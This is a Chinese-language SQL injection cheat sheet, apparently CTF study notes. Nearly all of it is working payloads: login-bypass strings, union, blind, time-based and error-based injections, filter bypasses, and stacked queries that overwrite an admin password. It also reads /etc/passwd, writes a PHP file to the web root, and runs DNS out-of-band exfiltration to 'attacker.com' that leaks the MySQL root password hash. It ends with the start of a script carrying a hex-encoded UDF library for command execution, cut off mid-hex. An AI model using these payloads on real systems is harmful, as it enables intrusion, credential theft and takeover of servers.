SQL注入

万能密码

1
2
3
4
5
6
7
8
9
admin' --
admin' #
admin'/\*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
1'^1# (False注入)

手注

  • 正常注入步骤(联合查询)

    查库名->查表名->查列名(字段名)->查值(数据)

    • 字段数量猜解

      1
      order by 4 --+
    • 判断页面回显数据字段位置

      1
      union select 1,2,3,4,x... --+
    • 数据库名

      1
      2
      3
      4
      5
      select database()
      select schema_name from information_schema.schemata;

      -- MySQL8新特性(>8.0.21)
      table information_schema.TABLESPACES_EXTENSIONS
    • 表名

      1
      union select 1,2,group_concat(table_name),4,xxxx from information_schema.tables where table_schema=database()
      • union查询

        1
        2
        3
        4
        5
        UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=database();   /* 列出所有用户自定义数据库中的表 */

        -- MySQL 4版本时用version=9,MySQL 5版本时用version=10
        UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10; /* 列出当前数据库中的表 */
        SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema!='information_schema' AND table_schema!='mysql';
      • 盲注

        1
        2
        3
        4
        AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'

        -- MySQL8新特性
        and (table information_schema.TABLESPACES_EXTENSIONS limit 1,1)>(BINARY('a'),'0')#
      • 报错

        1
        2
        AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));
        -- 在5.1.5版本中成功。
    • 列名(字段名)

      1
      Union select 1,2,group_concat(column_name),4,xxxx from information_schema.columns where table_schema=database() and table_name=(table_name) /*此处的表名为字符串型,也通过十六进制表示*/
      • union查询

        1
        UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
      • 盲注

        1
        AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'
      • 报错

        1
        2
        3
        4
        -- 在5.1.5版本中成功
        AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)
        -- MySQL 5.1版本修复了
        AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));
    • 值查询

      1
      2
      3
      4
      Union select 1,2,column_name,4,xxx from (database_name.)table_name

      -- MySQL8新特性
      and (table flag limit 1,1)>(BINARY('a'))#
  • 无回显

    • 盲注
      • 布尔盲注

        使用场景:对真/假条件返回的内容很容易区分

        1
        2
        3
        4
        (where | and) if(substr((select password from users where username='admin'),1,1)='a',1,0)

        select * from users where username=nouser or length(database())>8
        select * from users where username=nouser or ascii(substr(database(),1,1))<130
      • 时间盲注

        依赖于通过页面返回的延迟时间来判断条件是否正确。

        通常可利用的产生时间延迟的函数有:sleep()、benchmark(),还有许多进行复杂运算的函数也可以当做延迟的判断标准、笛卡尔积合并数据表、GET_LOCK双SESSION产生延迟等方法。

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        -- sleep()
        (where | and) if(substr((select password from users where username='admin'),1,1)='a',sleep(3),1)

        select * from users where username=$username (and | or) if(length(database())>8,sleep(3),1)

        -- pg_sleep()
        (and | or) (case when (select substr(password,1,1) from users)='a' then pg_sleep(5) else pg_sleep(0) end)

        and (select case when(substr((select password from users where username='admin'),1,1)='a') then (select 'roarctf' from pg_sleep(3)) else '1' end)='roarctf'

        -- 笛卡尔积 heavy query
        select * from users where id=1 and 1>(select count(*) from information_schema.columns A, information_schema.columns B, information_schema.columns C);
        select * from users where id=1 and if(1,concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b',0) and '1'='1';
    • 报错注入

      通过特殊函数的错误使用使其参数被页面输出。

      前提:服务器开启报错信息返回,也就是发生错误时返回报错信息。

      常见的利用函数有:exp()、floor()+rand()、updatexml()、extractvalue()等。

      1
      2
      3
      4
      5
      6
      (where|and|or) exp(~(select * from(select user())a));
      (where|and|or) pow(~(select * from(select user())a),9999);
      (where|and|or) updatexml(1,concat(0x7e,(select user()),0x7e),1);
      (where|and|or) extractvalue(1,concat(0x7e,(select user()),0x7e));
      (where|and|or) (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)));
      (where|and|or) (select count(*) from information_schema.tables group by concat((select user()),0x7e,ceil(rand(0)*2)));
    • limit注入

      使用 PROCEDURE函数进行注入,ANALYSE支持两个参数。

      1
      2
      3
      select id from users order by id desc limit 0,1 procedure analyse(1,1);
      select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
      select id from users order by id desc limit 0,1 into outfile "/var/www/html/1.php" LINES TERMINATED BY 0x16进制文件
    • update注入
      1
      2
      3
      #盲注
      update users set username = '0'|if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1) where id=15;
      update users set username = '0' | (substr(user(),1,1) regexp 0x5e5b6d2d7a5d) where id=14;
    • insert注入
      1
      2
      3
      #盲注
      insert into users values (16,'K0rz3n','0'| if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1));
      insert into users values (15,'K0rz3n','0'| (substr(user(),1,1) regexp 0x5e5b6d2d7a5d));
    • order by注入
      1
      2
      #报错注入
      select * from users order by updatexml(1,concat(0x7e,(select%20user()),0x7e),1);
    • group by注入
      1
      2
      #盲注
      select * from users group by 1 having substr((select database()),1,1)='c'
  • 宽字节注入

    国内最常使用的 GBK 编码,这种方式主要是绕过 addslashes 等对特殊字符进行转移的绕过。反斜杠 \ 的十六进制为 %5c,在你输入 %bf%27 时,函数遇到单引号自动转移加入 \,此时变为 %bf%5c%27%bf%5c 在 GBK 中变为一个宽字符「縗」。%bf 那个位置可以是 %81-%fe 中间的任何字符。不止在 SQL 注入中,宽字符注入在很多地方都可以应用。

    GET方式:利用URLencode ?id=1%df'||1={payload}%23

    POST方式:利用UTF-16或UTF-32或中文 ?id=1我'||1={payload}#

  • 堆叠注入

    由于分号;为MYSQL语句的结束符。若在支持多语句执行的情况下,可利用此方法执行其他恶意语句,如RENAMEDROP等。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    1;show databases;#
    1;show tables;#
    1;show columns from [表名];#

    1;update`ctfshow_user`set`pass`=(0x31323334)where(username=0x61646d696e)

    /*预处理*/
    1;PREPARE hacker from char(117,112,100,97,116,101,96,99,116,102,115,104,111,119,95,117,115,101,114,96,115,101,116,96,112,97,115,115,96,61,40,48,120,51,49,51,50,51,51,51,52,41,119,104,101,114,101,40,117,115,101,114,110,97,109,101,61,48,120,54,49,54,52,54,100,54,57,54,101,41);EXECUTE hacker;#
    1;PREPARE hacker from 0x7570646174656063746673686f775f75736572607365746070617373603d283078333133323333333429776865726528757365726e616d653d30783631363436643639366529;EXECUTE hacker;#

    1';SET @sqli=char(117,112,100,97,116,101,96,99,116,102,115,104,111,119,95,117,115,101,114,96,115,101,116,96,112,97,115,115,96,61,40,48,120,51,49,51,50,51,51,51,52,41,119,104,101,114,101,40,117,115,101,114,110,97,109,101,61,48,120,54,49,54,52,54,100,54,57,54,101,41);PREPARE hacker from @sqli;EXECUTE hacker;#
    1';SET @sqli=0x7570646174656063746673686f775f75736572607365746070617373603d283078333133323333333429776865726528757365726e616d653d30783631363436643639366529;PREPARE hacker from @sqli;EXECUTE hacker;#
  • 二次注入

    攻击者构造的恶意数据存储到数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。

    现在通常Web应用程序大多都会进行参数过滤,来防止注入。如果某处使用了urldecode()或者 rawurldecode()函数,则会导致二次解码生成单引号二引发注入,即二次注入。

    Web应用程序通常使用addslashes() 、mysql_real_escape_string()、mysql_escape_string()函数或者开启GPC来防止注入,也就是给单引号(‘’)、双引号(“”)、反斜杠()和NULL加上反斜杠转义。

    addslashes函数虽然在过滤之后会添加 “\” 进行转义,但是 “\” 并不会被带到数据库中

    • 二次urldecode注入

      单引号:%25%27

      双引号:%25%22

  • 文件操作

    读文件:

    SELECT LOAD_FILE('/etc/passwd')

    SELECT LOAD_FILE(0x2f666c6167)

    写文件:

    SELECT '<?php phpinfo();?>' into outfile '/var/www/html/phpinfo.php'

    select version() into outfile "/var/www/html/test.php" LINES TERMINATED BY 0x16进制文件

绕过(bypass)

  • 空格

    1. 多层括号嵌套
    2. 改用+号
    3. 使用注释代替(/*注释内容*/、/*! MYSQL专属*/)
    4. and/or后面可以跟上偶数个!、~可以替代空格,也可以混合使用(规律又不同),and/or前的空格可用省略
    5. %09, %0a, %0b, %0c, %0d, %a0等部分不可见字符可也代替空格
  • 单双引号

    1. 需要跳出单引号的情况:尝试是否存在编码问题而产生的SQL注入。
    2. 不需要跳出单引号的情况:字符串可用16进制表示、也可通过进制转换函数表示成其他进制。
    1
    2
    3
    4
    -- hex 编码
    SELECT * FROM Users WHERE username = 0x61646D696E
    -- char() 函数
    SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)
  • 逗号

    1. 采用 substr((database())from({})for(1)) 的形式
    2. 采用join:union select * from ((select 1)a join (select 2)b join (select 3)c);
  • 等号 / like

    1. regexp或者in
    2. <>
  • and / or

    1. 双写anandd、oorr
    2. 使用运算符代替&&、||
    3. 直接拼接=号,如:?id=1=(condition)
    4. 其他方法,如:?id=1^(condition)?id=1)xor(condition)
  • union

    1. 盲注:'and(select pass from users limit 1)='secret
  • select

    1. 有文件读取权限

      1
      2
      ' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+
      length('DocumentRoot'),10)='a'='' into outfile '/var/www/dump.txt
    2. 获取列名

      1
      2
      3
      ' and 列名 is not null#
      ' procedure analyse()#
      'and substr(pass,1,1)='a /*使用substr来做过滤条件*/
    3. handler语句代替select查询

      1
      2
      3
      4
      5
      6
      7
      /*通过handler语句查询users表的内容*/
      handler users open as yunensec; /*指定数据表进行载入并将返回句柄重命名*/
      handler yunensec read first; /*读取指定表/句柄的首行数据*/
      handler yunensec read next; /*读取指定表/句柄的下一行数据*/
      handler yunensec read next; /*读取指定表/句柄的下一行数据*/
      ...
      handler yunensec close; /*关闭句柄*/
  • limit

    1
    2
    3
    'and(select pass from users where id=1)='a
    'and(select pass from users group by id having id=1)='a
    'and length((select pass from users having substr(pass,1,1)='a'))
  • where

    1. join/left join/right join...on...
  • information_schema

    1. 替代表:sys.x$schema_flattened_keyssys.schema_table_statistics
  • 其他关键字

    1. 双写绕过关键字过滤

      1. 使用同义函数/语句代替,如if函数可用case when condition then 1 else 0 end语句代替。

      2. 使用 CONCAT() 时,任何个参数为 null,将返回 null,推荐使用 CONCAT_WS()CONCAT_WS()函数第一个参数表示用哪个字符间隔所查询的结果。

        1
        2
        3
        4
         SELECT 'a' 'd' 'mi' 'n';
        SELECT CONCAT('a', 'd', 'm', 'i', 'n');
        SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');
        SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n');
  • 括号

    1. order by 大小比较盲注
  • 数字

    1. true1

      1
      2
      def cal(x):
      return ('('+'(true)+'*x)[:-1]+')'
    2. 替换表

代替字符代替字符代替字符代替字符
false、!pi()0ceil(pi()*pi())10Aceil((pi()+pi())*pi())20K
true、!(!pi())1ceil(pi()*pi())+true11Bceil(ceil(pi())*version())21L
true+true2ceil(pi()+pi()+version())12Cceil(pi()*ceil(pi()+pi()))22M
floor(pi())、~~pi()3floor(pi()*pi()+pi())13Dceil((pi()+ceil(pi()))*pi())23N
ceil(pi())4ceil(pi()*pi()+pi())14Eceil(pi())*ceil(version())24O
floor(version()) //注意版本5ceil(pi()*pi()+version())15Ffloor(pi()*(version()+pi()))25P
ceil(version())6floor(pi()*version())16Gfloor(version()*version())26Q
ceil(pi()+pi())7ceil(pi()*version())17Hceil(version()*version())27R
floor(version()+pi())8ceil(pi()*version())+true18Iceil(pi()*pi()*pi()-pi())28S
floor(pi()*pi())9floor((pi()+pi())*pi())19Jfloor(pi()*pi()*floor(pi()))29T
  • sys系统库

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    #查询所有的库:
    SELECT table_schema FROM sys.schema_table_statistics GROUP BY table_schema;
    SELECT table_schema FROM sys.x$schema_flattened_keys GROUP BY table_schema;

    #查询指定库的表(若无则说明此表从未被访问):
    SELECT table_name FROM sys.schema_table_statistics WHERE table_schema='mspwd' GROUP BY table_name;
    SELECT table_name FROM sys.x$schema_flattened_keys WHERE table_schema='mspwd' GROUP BY table_name;

    #统计所有访问过的表次数:库名,表名,访问次数
    select table_schema,table_name,sum(io_read_requests+io_write_requests) io from sys.schema_table_statistics group by table_schema,table_name order by io desc;

    #查看所有正在连接的用户详细信息:连接的用户(连接的用户名,连接的ip),当前库,用户状态(Sleep就是空闲),现在在执行的sql语句,上一次执行的sql语句,已经建立连接的时间(秒)
    SELECT user,db,command,current_statement,last_statement,time FROM sys.session;

    #查看所有曾连接数据库的IP,总连接次数
    SELECT host,total_connections FROM sys.host_summary;

    #查看语句的执行记录
    SELECT * from sys.x$statement_analysis;
  • mysql系统库

    1
    2
    #查询指定库的表
    select group_concat(table_name) from mysql.innodb_table_stats where database_name=database()
  • 无列名注入(or被过滤)

    1
    2
    3
    select group_concat(`2`) from (select 1,2,3 union select * from user)x;
    select ((select 1,'ae',0)>(select * from user));
    ?id=-1' union all select * from (select * from users as a join users b using(id,username))c--+

DNS带外注入(OOB)

out-of-band带外数据(OOB)与inband相反,它是一种通过其他传输方式来窃取数据的技术(例如利用DNS解析协议和电子邮件)。OOB技术通常需要易受攻击的实体生成出站TCP/UDP/ICMP请求,然后允许攻击者泄露数据。OOB攻击的成功基于出口防火墙规则,即是否允许来自易受攻击的系统和外围防火墙的出站请求。而从域名服务器(DNS)中提取数据,则被认为是最隐蔽有效的方法。

利用原理:

img

利用条件:

需要Windows环境

1、DBMS中需要有可用的,能直接或间接引发DNS解析过程的子程序,即使用到UNC

2、Linux没有UNC路径,所以当处于Linux环境,不能使用该方式获取数据

工具:

DNSLog.cn

CEYE

1
2
3
4
5
6
7
8
9
#secure_file_priv指定文件夹或为空(没有设置)(mysql>5.5.53默认null,禁用导入导出)
#查询secure_file_priv
select @@secure_file_priv;
select @@global.secure_file_priv;
show variables like "secure_file_priv";

#注入
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com\\foobar'));
select load_file(concat(0x5c5c5c5c,(select database()),0x2E62383862306437653533326238663635333164322E642E7A6861636B2E63615C5C612E747874));

UDF

UDF是mysql的一个拓展接口,UDF(Userdefined function)可翻译为用户自定义函数,这个是用来拓展Mysql的技术手段。当我们有读取和写入权限以后,我们就可以尝试使用UDF提权的方法,从数据库的root权限提升到系统的管理员权限。

参考:

Mysql UDF 提权

MySQL UDF提权十六进制查询

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#参考脚本
#环境:Linux/MariaDB
import requests

url='http://15700a19-71aa-4c90-b3ca-b6db9d77c56d.chall.ctf.show/api/?id='
code='7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000